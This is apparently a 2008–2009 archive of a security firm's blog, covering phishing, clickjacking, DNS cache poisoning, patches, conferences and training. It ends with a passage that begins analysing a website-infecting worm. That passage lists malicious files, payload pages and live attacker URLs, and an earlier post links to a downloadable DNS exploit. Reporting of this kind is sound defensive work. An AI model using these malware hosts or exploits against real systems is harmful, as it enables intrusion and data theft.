
Dino Covotsos and Daniella Kafouris recently presented at Crawford college. They presented on various social networking issues. The talk was aimed at making parents more aware as to what threats their children are faced with when using social networks. From Mxit to Facebook. The presentation was well received by Crawford college. Telspace Systems will also be presenting on Clickjacking at the Security Summit 2009 on day 2, so if you are going to the summit try catch our talk.

On the security side, quite a few exploits have been released this month, the more dangerous ones being 'Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit' and 'Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Vulnerability' so please apply the relevant patches and updates as soon as possible.

Till the next post be safe and take care.

Twitters falls victim to ClickJack attack

2009-02-13T11:18:00.000+02:00

Twitter put an end to a clickjacking attack yesterday that got users to click on a link labelled “Don’t Click”.

In an attempt to satisfy their curiosity (or simply do what they were told not to do) thousands of users clicked on the link.

Whether they clicked on the link or not, a link would appear on their Twitter page with the same link and message as they originally received.

"We patched the "don't click" clickjacking attack 10 minutes ago. Problem should be gone," John Adams, aka Netik, an operations engineer at Twitter, tweeted around 11 am PST.

Although annoying, the clickjacking seems to be harmless and just propagated itself.

More on this attack can be found here.

ISG meeting - 5 Feb 2009

2009-02-06T09:57:00.002+02:00

The Information Security Group of Africa convened at the Standard Bank building on Grayston Street yesterday to share and learn about pertinent industry issues.

The meeting kicked off with an overview of an exciting project entitled “The Pubcast”. This initiative is meant to provide a platform to bring information security professionals together to discuss information security and to bridge the gap between infosec and social networking. The most recent “Pubcast” podcast was a live interview with Karel Rode and Craig Rosewarne – Acting Chairman and Chairman of the ISG, which was recorded by ITWeb at the meeting yesterday.

More information can be found at www.discussit.co.za.

Gareth Watt spoke about the new EMV (Chip & Pin) cards that are being issued locally. Watt discussed the evolution from magstripe that originated in the 1960s, to the EMV cards in use today. Although these new cards have many benefits, he said, it is still possible for them to be skimmed.

Charles Dick was there too and spoke about the Post Office’s Trust Centre. “SAPO does not see itself as a digital certificate seller,” he said. “Rather an organisation that creates a PKI environment for products and services.”

The trust centre will be launched in approximately 8 weeks time.

Catch Telspace Systems on Classic fM TONIGHT

2009-01-30T15:16:00.002+02:00

Catch Dino on Reuben Goldberg's ''The Internet Economy' tonight at 7pm where he will discuss security trends for 2009 as well as social networking threats.

This is the second time Dino has been asked to be on Classic fM and we hope it will become a regular thing.

Have an awesome weekend, guys!

Telspace Systems training dates for 2009

2009-01-14T10:53:00.003+02:00

Hey security peeps!

If any of you are interested in expanding your already vast intellectual scope, you can sign up to one of our training courses this year. Whether you can use it in your business, or simply want something to brag to your pals about, have a look at our dates and let me know if you would like to learn some practical, hands-on hacking lore.

Bluetooth & Wireless Hacking 101 (Jhb) dates:
Feb 25 & 26
June 24 & 25
Sep 16 & 17

Web Application Hacking 101 (Jhb) dates:
Mar 11 & 12
July 22 & 23
Oct 14 & 15

If this sounds like something you would be interested in, you can email me at ilva@telspace.co.za. It's gonna rock!

Happy New Year – but watch your back

2009-01-12T14:32:00.001+02:00

Happy New Year all! Hope everyone had a well-rested holiday, and not too upset at the notion of another year of full-scale grind.

Hackers had a field day while the rest of us rested - last week saw Twitter accounts, specifically those belonging to celebrities, being compromised by a hacker. This happened after the weekend’s spate of phishing scams that tried to harvest login and password details from users.

Britney Spears had a certain part of her anatomy insulted, while Barack Obama, Facebook’s Twitter account and Fox News’ also got compromised. This was the first time that Twitter was assaulted, and the fact that it was not only compromised by a hacker, but our fiendish phishers as well, shows that it has officially come under the radar.

Furthermore, this year saw Nokia rendered speechless due to an obscure SMS bug that halted all incoming SMSes arriving after a specially formulated and very malicious text message. Many Nokia users simply felt they had been forgotten over the festive season…

A recent study conducted by the Identity Theft Resource Center (ITRC) showed that 35 million data records were exposed last year in the US, in 656 incidents, which is a 47% increase from 2007.

The increase in hacker activity and data breaches remains a growing concern all over the world. Those of your who subjected yourselves to the news in the December, The Saturday Star and IOL Online both ran stories about the local government’s loss to cybercrime – as much as R400 million was reported as stolen as a a result of keyloggers and other dubious means.

This year, make it your priority to be as secure as you can be. Cliché or no, the proof is in the numbers.

Have a good one.

Seasons Greetings

2008-12-23T09:21:00.002+02:00

Everyone at Telspace Systems would like to wish you and your families a very happy and peaceful festive season.

Looking back on 2008, Telspace Systems had a very successful and bumper year. Early in the year, Charlie and I jet packed to Hack in the Box in Dubai where we hosted an intensive 2-day training session on Bluetooth and Wireless Hacking. During the same trip, I presented ‘Hacking the Bluetooth Stack for Fun, Fame and Mayhem’ which went off without a hitch.

Telspace Systems was a big role-player in this year’s local ITWeb Security Summit – not only did we present on “Hacking Wireless Modems” and break the story to the press, but we were involved in Johnny Long’s Hackers for Charity initiative. By Day 2 of this prestigious conference, Telspace Systems had convinced most of the delegates to do their part for the underprivileged. For those of you that are planning to attend this conference in 2009, get ready to witness a similar initiative ;)

Nearer to the end of the year, Charlie and I again set off overseas – this time to SecTor in Canada (Toronto). Again teaching delegates the art of hacking wireless and Bluetooth, we finished off the conference with a presentation on hacking internal proxies.

Finally, we have just learned that we have been chosen as a Technology Top 100 qualifier for 2009, making it the third year in a row we have been selected for this honour. 2009 holds many new training courses and great new services for our clients and we look forward to presenting these to you.

It has been an absolute pleasure working with you this year – without your continued support many of our achievements would not be possible.

Have a safe and wonderful New Year’s.

Dino hits the airwaves

2008-12-17T10:41:00.002+02:00

Following his successful interview on Reuben Goldberg's The Internet Economy on Classic fM in October, Dino was contacted to discuss this weekend's Saturday Star story Hacked! on 702 Talk Radio.

He was on air at 7:40 yesterday morning and spoke to David O'Sullivan about the security of open source and ethical hacking as a business.

Dino will be interviewed on Classic fM again in January, and I will make sure to post an announcement regarding dates and times as soon as we know what they are.

Have an awesome almost-holiday week, and keep tuning in!

Microsoft goes out with a bang

2008-12-10T09:56:00.001+02:00

Microsoft’s last patch for the year is a biggie – it is addressing no less than 28 security vulnerabilities.

Released yesterday, this patch solves the following issues:

• Six security holes in the ActiveX controls for Microsoft Visual Basic 6.0's Runtime Extended Files, all of which could allow remote code execution if a user visited a malicious website.
• Four memory-corruption issues in Internet Explorer
• Two other fixes addressed a total of 11 vulnerabilities in Microsoft Word and Excel
• Fixes for security issues in Microsoft's graphics library, Windows' search functionality, Windows Media Components and a vulnerability in Microsoft Office SharePoint Server.

More info is available here.

Make sure you download your updates!

Recent Facebook mail notification = FAIL

2008-12-01T11:21:00.003+02:00

Facebook users received an email notification last week asking that email notification settings which had been 'lost' be updated - followed by an embedded link. Was this a phishing scam, or was the email legit?

Being in the industry, we know to stay away from any emails asking for personal details to be updated/confirmed/changed as it is more often than not slimy phishers looking to score. Banks even expressly state that they will never EVER under any circumstances ask for details to be updated via any email link, as they are most often targeted and the most lucrative for scammers.

Facebook has certainly not gone under miscreants' radar, given the millions of users it has. Since the Facebook explosion, warnings of phishing scams and successful attenmpts have graced news sites everywhere - and offering users the knowledge they need to distinguish fake mails from real ones.

So now - given the press and multitude of people they service, why would Facebook send all their users a mail that looks so suspiciously like a phishing one? Let's run it through a quick evaluation...

Firstly, the language they use is quite phisher-esque - "Unfortunately, the settings that control which email notifications get sent to you were lost." Uhm... lost? This statement is broad, not backed up by any reasons as to why it happened, or what the details of the problem. Besides, there was no media coverage of the technological 'glitch' or issue that caused millions of setting to be simply 'lost'.. It scores 5 phishy points on its own.

Secondly, the embedded link, which is a big no-no when it comes to getting personal details, scores another 5 points. We all know, that even though the link may look liike it points to the actual site, once clicked, it can easily redirect us to a spoofed site.

Thirdly, the signature - 'The Facebook Team' - is so impersonal. If such a serious technological error did indeed occur, I think Facebook users deserve to have someone a bit higher up with an actual name and title to send them a mail. I mean, if Facebook can 'lose' my email notification settings in some unknown and mysterious way, what is to say that next time it will not be my personal details that disappear or my photos that get wiped out? Or, God forbid, I lose my friends! I'll give that one a score of 6 just for sheer cheekiness..

Let's just say, even based on these three points alone, I would simply press delete and feel a small sense of one-upmanship by having foiled yet another potential Internet crime and never give it a second thought.

Obviously, they are trying to downplay the problem, which could be a large contributor to the way the email was written. But Facebook should know better. In my opinion, they should have bypassed the email route altogether and rather had an alert or pop-up within the application itself. If they had sent a mail to my Facebook inbox, I also would have regarded it with a lot more positive interest.

‘Tis the season of folly

2008-11-21T14:34:00.001+02:00

December holidays are approaching, and we all know what that means… increased hacker activity as our precious youths get bored and turn to mayhem and destruction.

And to make matters worse, this time of year is always characterised by a manic rush for last-minute Christmas shopping – a lot of which is done online.

Also, with many people being on leave, companies might not have IT staff available to monitor and pick up attack behaviour.

This makes a killer combination for cybercrime instances – and we can expect to see a lot of people being duped, a lot of wesbites being defaced, and a many different malware popping up.

This year’s ‘Black Monday’ for malware is predicted for next week (November 24) – a day that is expected to be the worst of the year for computer attacks.

According to Adam Biviano, spokesman for Trend Micro, he expects to see a large increase in hackers using holiday-related tools such as electronic greeting cards as a front for attacks.

"It's typical for the orchestrators of malware attacks to make use of public holidays, make use of special occasions, because it gives them an angle from which to attract people to click on their link [or] download their attachment," he says.

Carlo Minassian, chief executive of Earthwave, says, “"It should be expected spamming and phishing will increase in the immediate future as we approach the upcoming Christmas period. Trends from past years indicate spamming and phishing spikes around this time."

So have a good weekends, guys – Monday’s set to be a scorcher ;)

South Africa prioritises cyber security

2008-11-14T09:39:00.000+02:00

South Africa seems to be waking up nicely to the threat of cyber crime. Roy Padayachie, Deputy communications minister, spoke at a high-level security conference in Geneva recently about our commitment locally.

“Clearly an effective cyber security framework is not merely a matter of government or law enforcement practices, but has to be addressed through prevention supported by society,” he said.

He also made mention of a very important fact – that security should not be left to technology alone. “Therefore,” he stated, “priority must be given to cyber security planning and management throughout society.”

According to his speech, South Africa intends to strengthen collaboration and partnerships at the national level through the establishment of a government-industry collaboration forum.

He said “Cyber threats or attacks do not recognise borders or laws; therefore, governments, business and civil society globally should work together to protect and secure their national cyber space and critical infrastructure. Governments throughout the world are not able to deal with the emerging threat on their own.”

This is great news for the country. As the 2010 World Cup draws eerily near, South Africa can expect to become a very lucrative target for cyber criminals, and it is best to have as many security measures in place as soon as possible. The many attacks populated near, during and after this year’s Olympics are a perfect example of how criminals take advantage of world events.

More on Padayachi’s speech can be found on ITWeb.

Cybercrime rises as markets fall

2008-10-30T10:51:00.010+02:00

Recent data published by Panda Security shows a direct correlation between the instability of the stock market and a dramatic rise in cyber crime.

According to Jeremy Matthews, head of Panda Security’s sub-Saharan operations “When we began looking into the specific effects cyber-criminals had on the economy during times of duress we found a startling connection: the criminal economy is closely interrelated with the global economy.”

He says that based on extensive research and analysis done by Panda of emerging malware patterns, they believe that criminal organisations are closely watching market performance and adapting as needed to ensure maximum profit.

Some of the key findings include:
• On average, the US stock market experienced between a 3 to 7 percent decline from Sep 1 to Oct 9. However, activity on the “malware markets” was the opposite: it grew substantially as the stock markets declined.
• From Sep 5 to 16, the Dow Jones Industrial Average, NASDAQ, S&P 500 and Composite Index all dropped from the plus 0.0 percent range to approximately negative 3.0 percent or lower. In the same period the Spanish IBEX 35 index and the London FTSE 100 also suffered major losses. The same timeframe witnessed a significant surge in daily malware threats; for example from Sept. 8th to Sept 10th the volume of daily threats grew from 10 150 to well over 24 000.
• From Sep 14 to 16, stock markets dropped from -0.5 to -5.5 percent while daily threats grew 50 percent each day, from 8 276 on the 14 to over 31 404 on the 16th.

Panda Security has provided the following diagrams to better illustrate this correlation (please click on images for a larger version).

Fig.1 – Stock market evolutions (Sep 1 to Oct 9) – source: moneycentral.msn.com

Fig.2 – Threat evolutions with key highlights (Sep 1 to Oct 9) – source: PandaLabs

According to Panda Security, there is an increase in adware and there has been a dramatic surge of fake anti-virus software scams lately. Now is the time to be more vigilant and more suspicious than ever before. It is evident that cybercriminals will stop at nothing to get your money, especially in desperate situations. Please be careful!

Microsoft’s emergency and Google’s malware

2008-10-24T14:37:00.003+02:00

This was a pretty bad week for the big guys as Microsoft and Google both came under a negative spotlight.

Microsoft had to release an emergency patch for a certain vulnerability that allows an internet worm to spread and makes remote execution possible.

It has been flagged as critical for users of Windows 2000, XP and Server 2003 and "important" for Windows Server 2008 and Windows Vista users.

Google was an inadvertent malware distributor for three infected sites, namely xlovelygirls.com, paincult.com, and iteenzy.com.

Local events
There are a couple of security-related events coming up locally for those that may be interested:

Cyber Crime Africa Summit
Hotel Apollo, Johannesburg
10-12 November

Practicing Innovation in Digital Forensics Management
Balalaika Hotel, Johannesburg
12-13 November

Security Africa Summit 2008
Balalaika Hotel, Johannesburg
26-28 November

Last but not least
Telspace is hotting up the media this week! You can catch a glimpse of the lesser-spotted Charlie on ITWeb’s Security Week newsletter today, and catch Dino C on Classic FM talking about cybercrime later tonight. Tune in to 102.7fm between 7 and 8pm!

SecTor 2008

2008-10-14T17:09:00.003+02:00

This year’s SecTor was simply amazing and had a great turn out. It featured a number of great talks by presenters such as Johnny Long who discussed “no-tech hacking” and HD Moore on "MetaSploit Prime". Everything was extremely well organised by the very accommodating SecTor team.

Our training went great, and we would like to thank everyone who attended our training and for their feedback. Last but not least, a huge thanks to Brad 'RenderMan' Haines for helping out with the training!

Wireless hacking gets more interesting…

2008-10-14T12:45:00.002+02:00

Russian hackers have discovered a mode to accelerate Wi-Fi decryption by using an NVIDIA graphics card, although no one seems to be clear which one is being used.

Apparently, it cracks passwords much faster than the usual methods. Although some sources cite that these type of new hacking techniques focused on wireless technology could see a move back to a wired network connections, I sincerely doubt that.

The nature of the technological advancement beast ensures that we are always moving in a forward direction – and never backwards. Besides, people tend to ignore security issues where convenience plays a factor.

In any case, suggestions are being made to apply tighter VPN controls, so you can always start there.

If anyone is interested in learn more about wireless hacking, you can contact me on ilva@telspace.co.za for more details on Telspace’s Bluetooth and Wireless 101 training.

Crime and punishment

2008-09-30T16:21:00.005+02:00

Things have pretty quiet locally, it seems – on the news front at least. A few bits of good news from overseas, though.

The UK has issued an update to its Computer Misuse Act. First off, the maximum penalty for unauthorised access to a computer system has been changed from six months to two years imprisonment. Here’s to hoping that will deter would-be criminals even further.

Also, denial of service attacks (DoS) have been declared a criminal offence – with miscreants looking at up to ten years in prison – so you better off gaining unlawful access ;-P.

Finally, distributing hacking tools for criminal intent has been declared a punishable offense. I am quite surprised it wasn’t already!

On that note, the US has just passed a bill that significantly increases the penalties relating to copyright infringement, although there has been major debate about it already.

Gartner says

A recent presentation from a Gartner executive brought up the issue about mobile security. Although his statements are nothing new, John Girard, a Gartner vice president is again reminding organisations that security risks are rising as smartphones become even smarter.

He did have some very good advice, though, “Data on devices should be encrypted, proper identity and access controls should be implemented and intrusion prevention systems should used to ensure that rogue devices don't access sensitive information,” he said.

He also told delegates at the IT Security Summit in London yesterday that Gartner is predicting that wireless ID theft and phishing attempts targeting mobile devices will become more and more prevalent throughout next year.

Be proactive – or walk the plank

2008-09-19T17:17:00.001+02:00

Some of the latest research released by Frost & Sullivan shows that the security assessment industry is doing pretty hot. According to a recent article on ITWeb, the global vulnerability assessment products market earned revenue of $297.5 million in 2007, and estimates this to more than triple by 2014.

Although this is good news for the security industry and just about everyone else who has private information floating around on other people’s networks, we find that South Africa is still meeting all this with a bit of resistance. Why, though?

The answer is quite a simple one – assessments are becoming a regulatory requirement from many countries’ governments. And this simply does not apply to us here in deep south of Africa…. Well, as of yet, at least.

There is a wonderful thing called the Protection of Personal Information Bill that will make a big difference in all of our privacy once it is passed as an Act. And companies are actually being advised to prepare for it properly now – because it will come into effect in the next few years.

The way it will influence the security assessment industry locally, for instance, is by forcing companies to not only ensure that all their client data is under the virtual version of Fort Knox, but that they have regular assessments done. As in, on a regular basis. Forever and ever.

However, this does not mean that companies can just relax in the mean time and wait for the Act to be born. Companies need to be proactive about this – those of you that take the initiative NOW to secure your corporate environment and to set up regular audits, will be way ahead of your competitors when the Act comes into effect. And possibly even avoid a jail sentence.

As soon as it becomes law, companies might not even be granted a grace period to ensure their security policies and procedures are in place, either. This means, they may be treading on illegal ground from day zero.

And don’t think you can easily pass under the radar – the Act will have its very own Big Brother in the form of a dedicated Commission. And although a set fine has not yet been established, you can look at about 12 months if you’re not properly prepared. And, if you hinder, obstruct or unduly influence the Commission, you can land yourself in jail for 10 years.

Have an awesome weekend – and ponder on it will ya! :-)

OMG, Telspace goes to Canada

2008-09-16T22:00:00.006+02:00

Just a short blog post to let everyone know that Telspace Systems will be presenting at SecTor in Canada during early October 2008. Our talk will be based on hacking internal proxy servers, more details can be read up at www.sector.ca

Telspace Systems is also going to be doing training at SecTor this year. Focusing on Bluetooth and Wireless hacking. Our course already has many students signed up, so we would appreciate it if you booked as soon as possible to miss out on the opportunity! It's going to be fantastic.

We are really looking forward to this awesome event again. If you are from anywhere near the region or you are attending SecTor, pop in and say hi!

P.S Telspace Systems is hiring again, so give us a call if you think you have what it takes.

Zombie networks go bos

2008-09-12T17:11:00.005+02:00

There has been a dramatic increase in the number of zombie networks cropping up lately. Recent metrics by the Shadowserver Foundation shows that in the last three months botnet numbers have quadrupled. Although strangely enough, there seems to be no accompanying increase in spam levels.

According to BBC News, "In June 2008 Shadowserver Foundation knew about more than 100,000 machines that were part of a botnet. By the end of August this figure had exceeded 450,000 machines."

Reason for this hectic spike are not clear, but there are many theories floating around the net. According to the SANS Internet Storm Centre, it may be more than a co-incidence that the dramatic rise in these networks is more or less parallel with the massive SQL injection attacks we experienced recently.

It is also being said that because it happened during schools holidays in the USA, it could just be due to bored kids. Maybe all the cool kids are doing it... but more than likely it is due to a combination of factors, rather than a specific one.

Whatever the reason behind the huge swell of compromised machines, users should more than ever before be vigilant with their security. Patch, patch, patch, and don't click on weird stuff... it can never be stressed enough.

Also, just a quick mention that our Hands on Hacking Unlimited course with Zone-h has been postponed until the 11th and 12th of November. If you have not yet sent in a booking form, please do so – it's gonna be awesome.

MySQL and SQL Column Truncation Vulnerabilities

2008-09-08T10:25:00.002+02:00

I've found a really interesting blog post this morning by Stefan Esser discussing a problem he calls 'MySQL and SQL Column Truncation Vulnerabilities'. This vulnerability takes advantage of the max_packet_size configuration by placing a large number of spaces and then a random character after the spaces. This basically allows an attacker to add "duplicate" entries to your database.

As you can image this would bring around pretty big issues with services like user registration. You can read his excellent post for a good breakdown of this vulnerability here.

This morning the first exploit for this kind of vulnerability in a web application was also released. This affects the latest version of Wordpress.

ISGA meeting in Bryanston

2008-09-04T15:36:00.004+02:00

The turn-out of today’s Information Security Group of Africa (ISGA) meeting at the Cisco Offices in Bryanston was really impressive.

Numerous information security role-players from many different companies (including Discovery, BCX, RSA, Deloitte, and Investec) convened to hear what their peers had to say about the industry.

On the ISGA front, Karel Rode, acting chairman, showed the crowd a slide of the ISGA website’s new look. “We will be displaying security-related live content from various sources onto the homepage,” he said.

The first talker of the day was Dion Fowles from Alexander Forbes who spoke extensively about the new Protection of Personal Information (PPI) Bill and what its impact will be on the corporate environment. He outlined and discussed the Bill’s eight principles, specifically Principle 6 (security safeguards) which is the only principle that deals with IT-related issues.

He took a layman’s approach to explaining the Bill and used his psychology background to make the presentation not only enjoyable, but understandable. All in all, a great presentation.

Mike Silber from Michalson’s Attorneys focused his speech around more ‘fast-tracked’ Bills. He believes that the PPI bill will be put on hold until the next elections.

He attempted to demystify the Companies Bill, the Competition Amendment Bill and the Consumer Protection Bill, which he sees as the mother of all Bills – complicated at best.

It was clear from both Fowles’ and Silber’s presentations, however, that it is a very lucrative time to be in the information security service busines. Once more of these Bills are passed, network breaches and compromised client data will have to be publicly disclosed and even announced through the media.

After the initial break, Jacques van Heerden from GTSP spoke to the audience about virtualisation. He mostly spoke about virtualisation in general – its definition, what a hypervisor is, where to start, pros and cons, although he did touch briefly upon how to handle your security if you plan on rolling out virtualisation.

He mentioned VMWare quite frequently during his talk, particularly pointing out how good their products are. What he did fail to mention, however, was a recent security vulnerability that was reported on milw0rm that exploits an ActiveX method in VMWare.

Finally, Peet Smith from Aptronics discussed security governance in IT. He believes that IT governance is currently maturing as there is a high awareness among corporates. Some of the keys drivers of this include legislation as well as customer requirements.

Well done and thank you to Karel and the Cisco guys for a great opportunity to network and learn. Looking forward to the next one!

DNS still exploitable

2008-08-14T11:48:00.010+02:00

Well for those of you who don't know it is still possible to poison the latest BIND patch with fully randomized ports. All that's required according to A Russian physicist, is a fast enough line, 2 computers and 10 hours of your time. He said "Attack took about half of the day, i.e. a bit less than 10 hours. So, if you have a GigE lan, any trojaned machine can poison your DNS during one night...". He released a post on his blog showing how he did it. The exploit is now also available from his blog and other websites distributing exploits: http://tservice.net.ru/~s0mbre/archive/dns/

When commenting on a New York Times article that discusses his findings, he said "Article says, that DJBDNS does not suffer from this attack. It does. Everyone does. With some tweaks it can take longer than BIND, but overall problem is there."

In other news Telspace systems will be presenting and providing wireless and Bluetooth training this year at the exceptional and must attend event Sector in Toronto, Canada.

Phishers target Google Lively

2008-08-08T13:40:00.001+02:00

Google's new social networking platform is under attack.

Google recently deployed its own social networking platform, called Google Lively, which has come under the phisher's radar.

Google Lively, currently in Beta stage, is similar to another application called Second Life, by Linden Labs. Lively is even being referred to as the “Second Life killer”.

Google Lively users can embed the application into their Web sites using Google widgets, just as YouTube videos can be embedded into a blog, MySpace or Facebook account. From there they can create their own “room” for site visitors to chat/socialise in. Google Lively allows for customisable characters and personal rooms.

The problem comes in when users have to authenticate themselves to the application, you can literally log in to Google Lively from a completely anonymous site hosting the content.

As you can imagine, this brings about serious issues; an attacker could easily imitate a login screen for Google Lively and embed an object that just stores the username and password.

Similar to a phishing attack, the user will be tricked into giving over their confidential information. It seems possible that the application may intercept the information and then forward the login details to the legitimate application, so from here the user wouldn't even know their account details have been stolen. The end-user would be clueless to what has just taken place.

The application download is a mere 469Kb file. From there the application will initialise and install.

Due to the fact that there was much hype about hacking Second Life, such as Michael Thumann's excellent talk on hacking Second Life, this definitely makes us think we will see a lot of interest in 'hacking' Google Lively.

Not to mention the amount of information that can be acquired through utilising the application for, let's say, ‘interesting' purposes.

It is highly recommended that a separate Google account be used for Google Lively activity. This would minimise risk, simply because if a password is stolen, the potential damage will be minimal to the end-user.

In addition to using a separate account, it advised that South African users watch out for illegitimate Web sites, e-mails and links specifically pertaining to Google Lively.

An attacker could easily imitate a login screen for Google Lively and embed an object that just stores the username and password.
Google is concerned about security and has obviously drafted up several Web sites providing users with information on several attacks.

They have said the following in response to the security speculation: “Sadly, phishing schemes and other malicious attempts to steal identities are rampant on the Web today. Lively is always working to improve site security and warns users of phishing attempts, but we feel that the Google Accounts system is safe and secure. Always be cautious when entering any username and password that you may have - being aware is your best protection!”

Google has also provided a few safety tips on how not to fall victim to these attacks. These include advising users to be on the lookout for “phishy” e-mails, which contain generic greetings like "Attention Lively Member" or "Dear lucky user", targeted specifically for room owners (ie, "We're conducting a survey of Lively room creators...").

These may contain links to Web sites that look exactly like lively sign-in pages. They have also described several techniques and methodologies to subscribers that hackers would utilise, such as forged “From” headers in the e-mail.

Judging by the amount of people that still fall victim to phishing attacks, more needs to be done than telling users to check for forged headers. More can be read from here: http://www.lively.com/help/bin/answer.py?answer=98980&topic=15053 .

With more local users utilising Google services, it is more than just the fact that you can login to Google Lively from any anonymous Web site. There are several very important aspects to be concerned about in terms of the potential damage that could be caused. This definitely leaves a great amount of worries and concerns for the end-user. We can definitely expect to see some sort of attack against Google Lively in the not too distant future.

Dan Kaminsky's Blackhat presentation packs room

2008-08-07T13:30:00.006+02:00

Black Hat had its hands full when Dan Kaminsky took the stage this year in Las Vegas. Dan's talk pulled around 1000 Black Hat attendees. Despite the fact that information about the vulnerability was released before hand. With the room overflowing and people even sitting on the floor to catch Dan's talk about the much publicised DNS flaws that could change the internet.

Surprisingly Dan's DNS findings won him a Pwnie award for most over hyped bug. In Dan's talk he spoke about his findings and the potential threats that could have come about. Dan has also uploaded a summary of his talk to his site. And we even have a cool time line video:

DNS vulnerability uncovered?

2008-07-23T16:42:00.004+02:00

It appears someone has rediscovered Dan Kaminsky's DNS vulnerability. Security researcher Halvar Flake, has posted a hypotheses of his findings on his blog. While this hasn't been confirmed to be the same issue, security researchers are saying it is indeed. we sure hope it is. Dan declined to confirm if it is the same vulnerability.

Matasano, one of the companies briefed about Dan's findings have leaked some information on their site, it was soon removed but is now mirrored on other sites for our reading pleasure. And according to Dave Aitel, chief technology officer at security vendor Immunity, hackers are almost certainly already developing attack code for the bug, and will most likely appear within the next few days.

Did anyone really expect this to be kept under wraps until Blackhat next month?

DNS Goes Bad

2008-07-17T14:09:00.001+02:00

There has been an enormous amount of concern on the Internet after the recent announcement that a severe issue has been discovered affecting almost all DNS servers.

The researcher and security guru credited for finding the vulnerability is Dan Kaminsky. He found the issue around six months ago, by complete accident.

We can all be grateful that Kaminsky responsibly disclosed this specific issue, as this vulnerability could have had severe consequences and ultimately he would have been able to obtain a hefty amount of money from the right (and wrong) people. In his words: "DNS goes bad, every Web site goes bad, and every e-mail goes... somewhere."

This specific finding has rocked the Internet and security world as we know it and although Kaminsky says nothing of this scale has happened before, he assures us that everything is genuinely under control.

Giants in the IT industry came together in March 2008 at Microsoft's campus in Redmond, Washington, where they engaged in secretive research to address the issue and come up with patches that could be released simultaneously by multiple vendors.

The meetings included Microsoft, Cisco, Sun and as well as the Internet Systems Consortium (ISC), creator of BIND (the most commonly used DNS server on the Internet) among others, and 16 researchers including Kaminsky.

"This hasn't been done before and it is a massive undertaking," said Kaminsky.

Microsoft released a patch for this vulnerability on Tuesday, 8 July with its 'Black Tuesday' updates.

What does DNS poisoning do?

DNS translates domain names to IP addresses (those numbers you can never remember) and is at the core of many Internet services. For example, www.itweb.co.za translates to 196.30.226.221.

This specific issue, which was discovered by Kaminsky, can allow attackers to poison DNS servers cache and essentially route Internet traffic in any way they want and effectively, impersonate any site they want.

This allows for 'phishing' attacks to be far more damaging. This is because even if you have entered the address correctly into the browser, you may still end up at a fraudulent site. The list of possibilities goes on with many other protocols.

This specific finding has rocked the Internet and security world as we know it and although Kaminsky says nothing of this scale has happened before, he assures us that everything is genuinely under control.
As a short description, phishing attacks can often be described as when attackers set up fraudulent Web sites to impersonate an authentic Web site. This is done to trick the user into disclosing sensitive information such as credit card numbers or banking details. Needless to say, the consequences of this attack could be severe.

We would definitely see a lot of pharming attacks. If this had to have been exploited in the wild, e-commerce and banking Web sites would have been greatest affected by the attacks.

Pharming is when a specific Web site's traffic is redirected to a bogus Web site. Many users would fall victim to this attack and not even know it. End-users would not even be aware they have provided very useful information which is harvested by the attackers. Similar to the attack in January 2005, the domain name for a large New York ISP, Panix, which was hijacked to direct to a site in Australia.

I recommend restricting access to the name server, filtering traffic, running local DNS cache, disabling recursion, and implementing source port randomisation.

I hope that the public and everyone reading any advisories pertaining to this issue will test their DNS servers and ultimately apply the relevant patches as soon as possible.

Most technical details of this vulnerability have been kept under wraps for now. This has been done to give administrators and users more time to patch their servers. Kaminsky will, however, disclose all information about the vulnerability at the BlackHat conference during August.

While many servers will automatically apply the relevant patches for this issue, a large number of servers are still vulnerable.

Those that are unsure if they are vulnerable to this issue can visit Kaminsky's Web site at http://www.doxpara.com/. From there, they will be able to see whether their name server is vulnerable. The relevant patches should be applied as soon as possible for servers that are vulnerable.

Kaminsky has said: "People should be concerned but they should not be panicking." There is still time for servers to be patched.

Kaminsky has also called on a number of security researchers to look for more issues, as he believes there still may be a number of undisclosed issues in DNS. He is also willing to let a finder of an issue come on stage with him at Defcon (2008 security conference), according to his blog.

ISC has so far encouraged DNS administrators with servers behind port-restricted firewalls to review their firewall policies to allow this protocol-compliant behavior.

Zone-h Partnership

2008-06-12T20:37:00.006+02:00

I am pleased to announce that Telspace Systems has officially signed a training partnership agreement with Zone-h.

This opens new doors for Zone-h in the South African region, it also allows us to market their courses locally in South Africa as exclusive partners.

We will be kicking off the first Zone-h training session on the 23rd and 24th of September 2008, with Hands-On-Hacking Unlimited. A full training schedule will be available on our website in the next week or so(you can always email us for a copy too). I strongly suggest you to attend the initial training session, as Roberto himself will be coming down to Johannesburg to present the course with us.

Silent Love China - Reference to sabc.co.za and reportstar.net hax

2008-06-03T23:01:00.008+02:00

After a bit of excitement in the office about yesterday’s post, we decided to do a bit of analysis on the worm that hit the SABC and Reportstar (time constraints applicable).

We obviously used our limited time trying to find out exactly what htm files, javascript, swf and exe’s we could get out, and what exactly they did.

The files which we are currently storing in our lab are:

m.js – Entry injection page

1847687.js – “// A Popular Free Statistics Service for 100 000+ Webmasters.”

456.htm – Loads 4561 or 4562 (swf)

4561.swf – we decompiled this

4562.swf – we decompiled this too

am6.htm - links to both http://ph.errtys.org/ax14.htm and http://ph.errtys.org/re10.htm - also includes activex objects and iframes of http://ph.errtys.org/axlz.htm and http://ph.errtys.org/re11.htm .

ax14.htm – javascripts and vbscript

axlz.htm - more scripts

bak.exe – l33t Trojan

dj – base64

dj.htm – includes “by shadow MSN:kiss117276@live.cn email:kiss117276@163.com and the base64. Microsoft Data Access Components (MDAC) Function (MS06-014).

dj.output.base64.decode – out put of base64 – jscript and "Adodb.Stream"

re10.htm – Javascript + base64

re11.htm – Javascript – including the interesting text “fuckyoukaspersky”

All these files are from iframe’s or links from src code, which were originally from http://www.dota11.cn/m.js.

A fantastic sitemap by Jeremy Conway details things very well:

Now if we take a look at Dj.htm:

<.HTML>

<.BODY>

<.title>by shadow MSN:kiss117276@live.cn email: kiss117276@163.com

<.script>

